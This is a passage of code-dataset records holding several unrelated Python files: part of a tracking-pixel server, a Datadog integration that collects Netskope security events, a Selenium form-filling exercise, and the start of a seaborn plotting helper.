in c:\n seen[c] = True\n\n ref_domain = parse_url(request.get_header('Referer')).host\n req_domain = parse_url(request.url).host\n\n if ref_domain and ref_domain != req_domain:\n seen[ref_domain] = True\n\n try:\n del(seen['ad.aloodo.com'])\n except KeyError:\n pass\n\n cdata = ' '.join(seen.keys())\n if cdata:\n response.set_header('Set-Cookie',\n 'site=\"%s\"; Max-Age=31536000; Path=/' % cdata)\n\n response.status=200\n response.set_header('Tk', 'D')\n \n accept = request.get_header('Accept')\n if not \"image\" in accept and \"text/html\" in accept:\n response.set_header('Content-Type', 'text/html')\n return template('info',\n req_headers=format_headers(request.headers),\n res_headers=format_headers(response.headers),\n req_url=request.url)\n else:\n response.set_header('Content-Type', 'image/png')\n if len(seen) >= 3 or path_domain == ref_domain:\n expdt = datetime.now() + timedelta(days=7)\n exp = mktime(expdt.timetuple())\n response.set_header('Expires', formatdate(\n timeval=exp, localtime=False, usegmt=True))\n return buf\n\nif __name__ == '__main__':\n run(host='localhost', port=8000, reloader=True)\n\n", "repo_name": "Aloodo/ad.aloodo.com", "sub_path": "pixel/pixel.py", "file_name": "pixel.py", "file_ext": "py", "file_size_in_byte": 2010, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.path.dirname", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 11, "usage_type": "name"}, {"api_name": "os.path.path.realpath", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 12, "usage_type": "name"}, {"api_name": "bottle.request.cookies", "line_number": 25, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 25, "usage_type": "name"}, {"api_name": "urllib3.util.parse_url", "line_number": 31, "usage_type": "call"}, {"api_name": "bottle.request.get_header", "line_number": 31, "usage_type": "call"}, {"api_name": "bottle.request", "line_number": 31, "usage_type": "name"}, {"api_name": "urllib3.util.parse_url", "line_number": 32, "usage_type": "call"}, {"api_name": "bottle.request.url", "line_number": 32, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 32, "usage_type": "name"}, {"api_name": "bottle.response.set_header", "line_number": 44, "usage_type": "call"}, {"api_name": "bottle.response", "line_number": 44, "usage_type": "name"}, {"api_name": "bottle.response.status", "line_number": 47, "usage_type": "attribute"}, {"api_name": "bottle.response", "line_number": 47, "usage_type": "name"}, {"api_name": "bottle.response.set_header", "line_number": 48, "usage_type": "call"}, {"api_name": "bottle.response", "line_number": 48, "usage_type": "name"}, {"api_name": "bottle.request.get_header", "line_number": 50, "usage_type": "call"}, {"api_name": "bottle.request", "line_number": 50, "usage_type": "name"}, {"api_name": "bottle.response.set_header", "line_number": 52, "usage_type": "call"}, {"api_name": "bottle.response", "line_number": 52, "usage_type": "name"}, {"api_name": "bottle.template", "line_number": 53, "usage_type": "call"}, {"api_name": "bottle.request.headers", "line_number": 54, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 54, 
"usage_type": "name"}, {"api_name": "bottle.response.headers", "line_number": 55, "usage_type": "attribute"}, {"api_name": "bottle.response", "line_number": 55, "usage_type": "name"}, {"api_name": "bottle.request.url", "line_number": 56, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 56, "usage_type": "name"}, {"api_name": "bottle.response.set_header", "line_number": 58, "usage_type": "call"}, {"api_name": "bottle.response", "line_number": 58, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 60, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 60, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 61, "usage_type": "call"}, {"api_name": "bottle.response.set_header", "line_number": 62, "usage_type": "call"}, {"api_name": "bottle.response", "line_number": 62, "usage_type": "name"}, {"api_name": "email.utils.formatdate", "line_number": 62, "usage_type": "call"}, {"api_name": "bottle.error", "line_number": 19, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 20, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 21, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 22, "usage_type": "call"}, {"api_name": "bottle.run", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "29848002182", "text": "import re\nimport time\nfrom typing import Tuple\n\nimport datadog_agent\nimport requests\n\nfrom datadog_checks.base import AgentCheck\nfrom datadog_checks.base.errors import ConfigTypeError, ConfigurationError, ConfigValueError\n\nfrom . import cds_netskope_constants as constants\nfrom . import cds_netskope_utils as utils\nfrom .cds_netskope_api_client import NetskopeClient\nfrom .cds_netskope_datadog_client import DatadogClient, InvalidKeyError\nfrom .cds_netskope_errors import BillingSubmitError\nfrom .cds_netskope_events import EVENTS_CONFIG\n\n\ndef handle_errors(func):\n def handler(self, *args, **kwargs):\n try:\n return func(self, *args, **kwargs)\n except Exception:\n raise\n finally:\n self.dd_client.close()\n\n return handler\n\n\nclass CrestDataSystemsNetskopeCheck(AgentCheck):\n # This will be the prefix of every metric and service check the integration sends\n __NAMESPACE__ = \"cds.netskope\"\n\n def __init__(self, name, init_config, instances):\n super(CrestDataSystemsNetskopeCheck, self).__init__(name, init_config, instances)\n\n # Set log index to all for searching checkpoint logs from Datadog platform\n self.log_index = \"*\"\n\n # Read and set api_key and app_key for datadog API authentication\n self._api_key = datadog_agent.get_config(\"api_key\")\n self._app_key = datadog_agent.get_config(\"app_key\")\n\n self._site = datadog_agent.get_config(\"site\") or constants.DEFAULT_SITE\n\n # Use self.instance to read the check configuration\n self.host = self.instance.get(\"host\")\n self.v2_api_token = self.instance.get(\"v2_api_token\")\n self.min_collection_interval = self.instance.get(\"min_collection_interval\")\n self.events = self.instance.get(\"events\", constants.DEFAULT_EVENTS)\n self.collect_alerts = self.instance.get(\"collect_alerts\")\n self.ingest_metrics = self.instance.get(\"ingest_metrics\")\n\n # Initialize Datadog API client\n self.initialize_dd_client()\n\n @handle_errors\n def check(self, _):\n # Validate user configurations\n try:\n self.validate_configurations()\n msg = \"All the provided configurations in conf.yaml are valid.\"\n 
self.log.info(f\"Netskope | HOST={self.host} | MESSAGE={msg}\") # noqa: G004\n\n # Using checks and events, show that validations are successful.\n self.ingest_service_check_and_event(\n status=0,\n tags=constants.CONF_VAL_TAG,\n message=msg,\n title=constants.CONF_VAL_TITLE,\n source_type=constants.CONF_VAL_SOURCE_TYPE,\n )\n except Exception:\n err_message = (\n \"Error occurred while validating the provided configurations in conf.yaml.\"\n \" Please check logs for more details.\"\n )\n # Using checks and events, show that validations are not successful.\n self.ingest_service_check_and_event(\n status=2,\n tags=constants.CONF_VAL_TAG,\n message=err_message,\n title=constants.CONF_VAL_TITLE,\n source_type=constants.CONF_VAL_SOURCE_TYPE,\n )\n raise\n\n # Initialize Netskope API client for data collection\n self.initialize_client()\n\n # Authenticate Netskope API using V2 token\n try:\n self.authentication()\n msg = \"Authentication with Netskope is successful.\"\n self.log.info(f\"Netskope | HOST={self.host} | MESSAGE={msg}\") # noqa: G004\n\n # Using checks and events, show that authentication is successful.\n self.ingest_service_check_and_event(\n status=0,\n tags=constants.AUTH_TAG,\n message=msg,\n title=constants.AUTH_TITLE,\n source_type=constants.AUTH_SOURCE_TYPE,\n )\n except Exception:\n err_message = (\n \"Error occurred while authenticating the Netskope credentials. Please check logs for more details.\"\n )\n # Using checks and events, show that authentication is not successful.\n self.ingest_service_check_and_event(\n status=2,\n tags=constants.AUTH_TAG,\n message=err_message,\n title=constants.AUTH_TITLE,\n source_type=constants.AUTH_SOURCE_TYPE,\n )\n raise\n\n self.log.info(f\"Netskope | HOST={self.host} | MESSAGE=Start of the data collection.\") # noqa: G004\n start_time = time.time()\n\n # Netskope event data collection and Datadog ingestion\n for event_conf in EVENTS_CONFIG:\n event_type = event_conf.get(\"type\")\n\n # Check if event type is configured in configuration\n if (event_type != \"alert\" and event_type not in self.events) or (\n event_type == \"alert\" and not self.collect_alerts\n ):\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Skipping data collection for\" # noqa: G004\n f\" '{event_type}' event, since it's not specified in the configuration.\"\n )\n continue\n\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Collecting data for '{event_type}' event.\" # noqa: G004\n )\n\n checkpoint = self.dd_client.get_checkpoint(event_type)\n index, from_timestamp = self.parse_checkpoint(event_type, checkpoint)\n\n event_data = self.client.fetch_events_data(event_type, index, from_timestamp=from_timestamp)\n event_collected = False\n\n try:\n for events in event_data:\n event_collected = True\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Fetched {len(events)} events of\" # noqa: G004\n f\" '{event_type}' event.\"\n )\n\n if not events:\n continue\n\n # Submit billing metrics with events count\n self.submit_billing_metrics(len(events))\n\n for panel_name, panel_conf in event_conf.get(\"dashboard_panels\", {}).items():\n if panel_conf.get(\"type\") not in [\"metric\", \"log\"]:\n self.log.error(\n f\"Netskope | HOST={self.host} | MESSAGE=Invalid data type provided\" # noqa: G004\n f\" for '{panel_name}' panel, hence skipping data collection of this panel. 
Allowed\"\n f\" data types are metric and log but found: {panel_conf.get('type')}\"\n )\n continue\n\n try:\n self.ingest_dashboard_data(events, panel_name, panel_conf)\n except Exception:\n err_msg = (\n f\"Netskope | HOST={self.host} | MESSAGE=Error occurred while ingesting\" # noqa: G004\n f\" {panel_conf['type']}s data of '{panel_name}' panel, hence skipping\"\n f\" {panel_conf['type']}s ingestion of this panel.\"\n )\n self.log.exception(err_msg)\n except BillingSubmitError:\n err_message = \"Error occurred while submitting billing logs/metrics, hence stopping the execution...\"\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise\n except InvalidKeyError:\n self.log.error(\n f\"Netskope | HOST={self.host} | MESSAGE=Datadog API access forbidden error occurred\" # noqa: G004\n f\" while collecting/ingesting data of '{event_type}' event, hence skipping further data\"\n \" collection and ingestion for all the events.\"\n )\n raise\n except Exception:\n self.log.exception(\n f\"Netskope | HOST={self.host} | MESSAGE=Error occurred while collecting/ingesting\" # noqa: G004\n f\" data of '{event_type}' event, hence skipping further data collection and ingestion for\"\n \" this event.\"\n )\n\n if not event_collected:\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=No data found of '{event_type}' event,\" # noqa: G004\n \" hence no data will be ingested.\"\n )\n else:\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE='{event_type}' event data ingestion is\" # noqa: G004\n \" completed.\"\n )\n\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Submitting checkpoint log for '{event_type}'\" # noqa: G004\n \" event.\"\n )\n self.dd_client.save_checkpoint(event_type, {\"index\": index})\n\n elapsed_time = time.time() - start_time\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=End of the data collection.\" # noqa: G004\n f\" Time taken: {elapsed_time:.3f} seconds\"\n )\n\n def ingest_dashboard_data(self, event_data, panel_name, panel_conf):\n \"\"\"Ingests event data to datadog platform in form of metrics and logs.\"\"\"\n if panel_conf.get(\"type\") == \"metric\" and self.ingest_metrics:\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Ingesting metrics for '{panel_name}' panel.\" # noqa: G004\n )\n metrics_list = utils.generate_metrics(\n event_data,\n panel_name,\n panel_conf[\"event_fields\"],\n panel_conf[\"alias_fields\"],\n panel_conf[\"tag_fields\"],\n panel_conf[\"metric_fields\"],\n panel_conf.get(\"is_count\", False),\n panel_conf.get(\"timestamp_field\"),\n )\n metrics_payload = []\n for metric in metrics_list:\n metric_field = metric[0].split(\".\")[-1]\n tags = (\n metric[2]\n + self.instance.get(\"tags\", [])\n + panel_conf.get(\"custom_metric_tags\", {}).get(metric_field, (None, []))[1]\n + [f\"{constants.HOST_TAG_NAME}:{self.host}\"]\n )\n metric_name_prefix = \".\".join(metric[0].split(\".\")[:-1])\n metric_name = \".\".join(\n [\n metric_name_prefix,\n panel_conf.get(\"custom_metric_tags\", {}).get(metric_field, [None])[0] or metric_field,\n ]\n )\n if not utils.is_float(metric[1]):\n metric[1] = 0\n metrics_payload.append((metric_name, metric[1], tags, metric[3]))\n self.dd_client.submit_metrics(metrics_payload)\n\n elif panel_conf.get(\"type\") == \"log\":\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Ingesting logs for '{panel_name}' panel.\" # noqa: G004\n )\n self.dd_client.submit_logs(\n panel_name,\n utils.generate_logs(\n event_data,\n 
panel_conf[\"event_fields\"],\n panel_conf[\"alias_fields\"],\n panel_conf.get(\"conditions\"),\n ),\n panel_conf.get(\"timestamp_field\"),\n fn_to_evaluate_event=lambda event: (\n utils.field_parser(\n event,\n panel_conf[\"log_fields\"], # noqa: B023\n ),\n utils.tag_generator(event, panel_conf[\"tag_fields\"]), # noqa: B023\n ),\n )\n\n def validate_configurations(self):\n \"\"\"Validates the configurations provided by the user.\"\"\"\n\n # Validating host field\n if not re.match(r\"^((?!-)[A-Za-z0-9-\\.]*)$\", self.host):\n err_message = (\n \"'Host' is not valid. Please provide a proper hostname without protocol, \"\n \"any special characters, and slashes. Permitted characters are (A-Z), (a-z), (0-9), \"\n \"hyphen(-) and period(.)\"\n )\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigTypeError(err_message)\n\n # Validate events field\n if self.events is None or self.events == []:\n no_events_message = (\n \"'events' field is provided but no value is found. No data will be collected for any endpoints.\"\n )\n self.events = []\n self.log.info(f\"Netskope | HOST={self.host} | MESSAGE={no_events_message}\") # noqa: G004\n\n for event in self.events:\n if event not in constants.DEFAULT_EVENTS:\n err_message = (\n f\"'{event}' value for 'events' field is not valid. \"\n \"Permitted values are 'infrastructure', 'network', 'connection', 'audit', 'application', \"\n \"and 'incident'.\"\n )\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigurationError(err_message)\n\n events_conf_msg = f\"The list of configured events is {self.events}.\"\n self.log.info(f\"Netskope | HOST={self.host} | MESSAGE={events_conf_msg}\") # noqa: G004\n\n # Validate collect_alerts\n if not isinstance(self.collect_alerts, bool):\n err_message = \"'collect_alerts' field is not valid. Permitted values are true and false.\"\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigTypeError(err_message)\n\n alerts_conf_msg = \"Alerts data collection is marked true.\"\n if not self.collect_alerts:\n alerts_conf_msg = \"Alerts data collection is marked false.\"\n self.log.info(f\"Netskope | HOST={self.host} | MESSAGE={alerts_conf_msg}\") # noqa: G004\n\n # Validate ingest_metrics\n if not isinstance(self.ingest_metrics, bool):\n err_message = \"'ingest_metrics' field is not valid. 
Permitted values are true and false.\"\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigTypeError(err_message)\n\n metrics_conf_msg = (\n \"Metrics data ingestion is marked true, hence metrics data will be ingested to Datadog platform.\"\n )\n if not self.ingest_metrics:\n metrics_conf_msg = \"Metrics data ingestion is marked false, hence metrics data ingestion will be skipped.\"\n self.log.info(f\"Netskope | HOST={self.host} | MESSAGE={metrics_conf_msg}\") # noqa: G004\n\n # validate min_collection_interval\n try:\n self.min_collection_interval = int(self.min_collection_interval)\n if self.min_collection_interval <= 0:\n raise ValueError\n except (ValueError, TypeError):\n if self.min_collection_interval is None:\n err_message = \"'min_collection_interval' field is missing.\"\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigurationError(err_message)\n\n err_message = (\n \"'min_collection_interval' must be a positive integer value greater than 0,\"\n f\" but found {self.min_collection_interval}.\"\n )\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigValueError(err_message)\n\n def authentication(self):\n \"\"\"Validates the Netskope credentials.\"\"\"\n try:\n event_types = self.events.copy()\n if self.collect_alerts:\n event_types.append(\"alert\")\n forbidden_event_type = self.client.authenticate(event_types, constants.AUTH_INDEX)\n\n if forbidden_event_type:\n err_message = (\n f\"Insufficient API permission of following event's endpoints: {forbidden_event_type}.\"\n \" Verify the V2 token and its permission for mentioned events.\"\n )\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigurationError(err_message)\n\n except requests.exceptions.SSLError as err:\n err_message = \"SSL verification failed.\"\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message} Error: {err}\") # noqa: G004\n raise ConfigurationError(err_message) from err\n\n except requests.exceptions.ConnectionError as err:\n err_message = \"Authentication failed for provided credentials. Please check the provided host.\"\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message} Error: {err}\") # noqa: G004\n raise ConfigurationError(err_message) from err\n\n except requests.exceptions.HTTPError as err:\n if err.response.status_code == 403:\n err_message = (\n \"Authentication failed for provided credentials.\"\n \" Please check the provided token and its permissions.\"\n )\n self.log.error(\n f\"Netskope | HOST={self.host} | STATUS_CODE={err.response.status_code} \" # noqa: G004\n f\"| MESSAGE={err_message} Error: {err}\"\n )\n raise ConfigurationError(err_message) from err\n else:\n err_message = (\n \"Error occurred while validating the Netskope credentials. Please check the provided credentials.\"\n )\n self.log.error(\n f\"Netskope | HOST={self.host} | STATUS_CODE={err.response.status_code} \" # noqa: G004\n f\"| MESSAGE={err_message} Error: {err}\"\n )\n raise ConfigurationError(err_message) from err\n\n except Exception as err:\n err_message = (\n \"Error occurred while validating the Netskope credentials. 
Please check the provided credentials.\"\n )\n self.log.exception(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigurationError(err_message) from err\n\n def initialize_dd_client(self):\n \"\"\"Validates API key and initializes datadog API client for submitting logs and metrics through API.\"\"\"\n\n if not self._api_key or not self._app_key:\n err_message = \"API Key is missing.\" if not self._api_key else \"App Key is missing.\"\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n\n # Using checks and events, show that Datadog API key or app key is missing.\n self.ingest_service_check_and_event(\n status=2,\n tags=constants.API_VAL_TAG,\n message=err_message,\n title=constants.API_VAL_TITLE,\n source_type=constants.API_VAL_SOURCE_TYPE,\n )\n raise ConfigurationError(err_message)\n\n api_key_auth = {\"apiKeyAuth\": self._api_key, \"appKeyAuth\": self._app_key}\n\n try:\n self.dd_client = DatadogClient(self._site, api_key_auth, self)\n self.dd_client.validate_keys()\n except Exception as ex:\n raise ConfigurationError(ex) from ex\n\n def initialize_client(self):\n \"\"\"Initializes Netskope client with v2 API token.\"\"\"\n\n self.client = NetskopeClient(self.host, self.v2_api_token, self.log)\n\n def ingest_service_check_and_event(self, **service_check_event_args):\n \"\"\"\n Ingest Service Check and Event for any particular milestone with success or error status.\n **service_check_event_args =\n - For check = [, , ]\n - For Event = [, , , , ]\n \"\"\"\n self.service_check(\n constants.NETSKOPE_CHECK_NAME,\n service_check_event_args.get(\"status\"),\n service_check_event_args.get(\"tags\"),\n self.host,\n service_check_event_args.get(\"message\"),\n )\n self.event(\n {\n \"host\": self.host,\n \"alert_type\": constants.STATUS_NUMBER_TO_VALUE[service_check_event_args.get(\"status\")],\n \"tags\": service_check_event_args.get(\"tags\"),\n \"msg_text\": service_check_event_args.get(\"message\"),\n \"msg_title\": service_check_event_args.get(\"title\"),\n \"source_type_name\": service_check_event_args.get(\"source_type\"),\n }\n )\n\n def get_netskope_index(self, event_name: str) -> str:\n \"\"\"Generates and returns netskope index with current timestamp as a unique identifier.\n\n :param event_name: netskope event name\n :type event_name: str\n\n :return: generated index string\n :rtype: str\n \"\"\"\n timestamp = int(time.time())\n return \".\".join([constants.NETSKOPE_INDEX_PREFIX, event_name, str(timestamp)])\n\n def submit_billing_metrics(self, count: int) -> None:\n \"\"\"Submits billing metrics with events count.\n\n :param count: event count\n :type count: int\n \"\"\"\n try:\n checkpoint = self.dd_client.get_checkpoint(\n constants.BILLING_CHECKPOINT, search_host=False, raise_error=True\n )\n event_count = 0\n tag_count = 0\n if checkpoint:\n event_count = checkpoint.get(\"event-count\")\n tag_count = checkpoint.get(\"tag-count\")\n\n event_count += count\n\n while event_count // constants.BILLING_PER_EVENTS >= tag_count:\n tag_count += 1\n\n billing_metrics_body = (\n constants.MARKETPLACE_BILLING_METRIC,\n event_count,\n [f\"event_tag:{time.time()}\", f\"event-count:{event_count}\", f\"tag-count:{tag_count}\"],\n )\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Submitting marketplace billing metric\" # noqa: G004\n \" with current timestamp.\"\n )\n self.dd_client.submit_metrics([billing_metrics_body], latest=True, include_prefix=False)\n\n self.dd_client.save_checkpoint(\n 
constants.BILLING_CHECKPOINT, {\"event-count\": event_count, \"tag-count\": tag_count}\n )\n except Exception as ex:\n raise BillingSubmitError from ex\n\n def parse_checkpoint(self, event_type: str, checkpoint: dict) -> Tuple[str, bool]:\n \"\"\"Parses checkpoint data and finds netskope index.\n\n :param event_type: netskope event type\n :type event_type: str\n :param checkpoint: checkpoint data\n :type checkpoint: dict\n\n :return: index and from_timestamp flag\n :rtype: (str, bool)\n \"\"\"\n index = None\n from_timestamp = True\n\n if not checkpoint:\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=No checkpoint found of '{event_type}' event,\" # noqa: G004\n f\" hence data will be collected from default collection time(={constants.TIMESTAMP_OFFSET} seconds).\"\n )\n else:\n index = checkpoint.get(\"index\")\n checkpoint_timestamp = utils.get_epoch_timestamp(checkpoint.get(\"timestamp\"))\n if checkpoint_timestamp and int(time.time()) - checkpoint_timestamp > constants.TIMESTAMP_OFFSET:\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Found checkpoint for '{event_type}' event,\" # noqa: G004\n \" but checkpoint time is older than default collection time so data will be collected\"\n f\" from default collection time(={constants.TIMESTAMP_OFFSET} seconds). Checkpoint: {checkpoint}\"\n )\n else:\n from_timestamp = False\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Found checkpoint for '{event_type}' event,\" # noqa: G004\n f\" hence collecting the data from last checkpoint. Checkpoint: {checkpoint}\"\n )\n\n index = self.get_netskope_index(event_type) if not index else index\n\n return index, from_timestamp\n", "repo_name": "gjanco/mezmo-dd-marketplace", "sub_path": "crest_data_systems_netskope/datadog_checks/crest_data_systems_netskope/check.py", "file_name": "check.py", "file_ext": "py", "file_size_in_byte": 24905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datadog_checks.base.AgentCheck", "line_number": 31, "usage_type": "name"}, {"api_name": "datadog_agent.get_config", "line_number": 42, "usage_type": "call"}, {"api_name": "datadog_agent.get_config", "line_number": 43, "usage_type": "call"}, {"api_name": "datadog_agent.get_config", "line_number": 45, "usage_type": "call"}, {"api_name": "time.time", "line_number": 121, "usage_type": "call"}, {"api_name": "cds_netskope_events.EVENTS_CONFIG", "line_number": 124, "usage_type": "name"}, {"api_name": "cds_netskope_errors.BillingSubmitError", "line_number": 179, "usage_type": "name"}, {"api_name": "cds_netskope_datadog_client.InvalidKeyError", "line_number": 183, "usage_type": "name"}, {"api_name": "time.time", "line_number": 214, "usage_type": "call"}, {"api_name": "re.match", "line_number": 283, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigTypeError", "line_number": 290, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 308, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigTypeError", "line_number": 317, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigTypeError", "line_number": 328, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 346, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigValueError", "line_number": 353, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 369, 
"usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 371, "usage_type": "attribute"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 374, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 376, "usage_type": "attribute"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 379, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 381, "usage_type": "attribute"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 391, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 400, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 407, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 424, "usage_type": "call"}, {"api_name": "cds_netskope_datadog_client.DatadogClient", "line_number": 429, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 432, "usage_type": "call"}, {"api_name": "cds_netskope_api_client.NetskopeClient", "line_number": 437, "usage_type": "call"}, {"api_name": "time.time", "line_number": 473, "usage_type": "call"}, {"api_name": "time.time", "line_number": 500, "usage_type": "call"}, {"api_name": "cds_netskope_errors.BillingSubmitError", "line_number": 512, "usage_type": "name"}, {"api_name": "time.time", "line_number": 536, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 514, "usage_type": "name"}]} +{"seq_id": "5775541878", "text": "from selenium import webdriver\nimport time \nimport math\nfrom selenium.webdriver.common.by import By\nimport os\n\nlink = \"http://suninjuly.github.io/file_input.html\"\n\ntry:\n browser = webdriver.Chrome()\n browser.get(link)\n \n input1 = browser.find_element(By.CSS_SELECTOR, 'input[name=\"firstname\"][required=\"\"]')\n input1.send_keys(\"Ivan\")\n input2 = browser.find_element(By.CSS_SELECTOR, 'input[name=\"lastname\"][required=\"\"]')\n input2.send_keys(\"Petrov\")\n input3 = browser.find_element(By.CSS_SELECTOR, 'input[name=\"email\"][required=\"\"]')\n input3.send_keys(\"asd@gmail.com\")\n \n current_dir = os.path.abspath(os.path.dirname(__file__)) # получаем путь к директории текущего исполняемого файла \n file_path = os.path.join(current_dir, 'file.txt') # добавляем к этому пути имя файла \n element = browser.find_element(By.ID, \"file\")\n # element.send_keys(file_path)\n \n button = browser.find_element(By.CSS_SELECTOR, \"button.btn\") \n button.click()\n \n time.sleep(2)\n\n # находим элемент, содержащий текст\n welcome_text_elt = browser.find_element(By.TAG_NAME, \"h1\")\n # записываем в переменную welcome_text текст из элемента welcome_text_elt\n welcome_text = welcome_text_elt.text\n\n # с помощью assert проверяем, что ожидаемый текст совпадает с текстом на странице сайта\n assert \"Congratulations! 
You have successfully registered!\" == welcome_text\n \nfinally:\n # успеваем скопировать код за 30 секунд\n time.sleep(4)\n # закрываем браузер после всех манипуляций\n browser.quit()", "repo_name": "inha1e/stepik_auto", "sub_path": "lesson6_step10.py", "file_name": "lesson6_step10.py", "file_ext": "py", "file_size_in_byte": 1832, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 13, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 15, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 15, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 22, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 22, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 25, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 25, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 31, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 31, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "11117481134", "text": "import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndef plotar (titulo, labelx, labely, x, y, dataset):\n sns.set_palette('Accent')\n sns.set_style('darkgrid')\n ax = sns.lineplot(x=x, y=y, data=dataset)\n ax.figure.set_size_inches(12,6)\n ax.set_title(titulo, loc='left', fontsize=18)\n ax.set_xlabel(labelx, fontsize=14)\n ax.set_ylabel(labely, fontsize=14)\n ax = ax\n plt.show()\n\ndef plot_comparacao(x, y1, y2, y3, dataset, titulo):\n #para plotar mais q um grafico na mesma func\n plt.figure(figsize=(16,12))\n ax = plt.subplot(3,1,1)\n ax.set_title(titulo,fontsize=18, loc='left')\n sns.lineplot(x=x, y=y1, data=dataset)\n plt.subplot(3,1,2)\n sns.lineplot(x=x, y=y2, data=dataset)\n plt.subplot(3,1,3)\n sns.lineplot(x=x, y=y3, data=dataset)\n ax=ax\n", "repo_name": 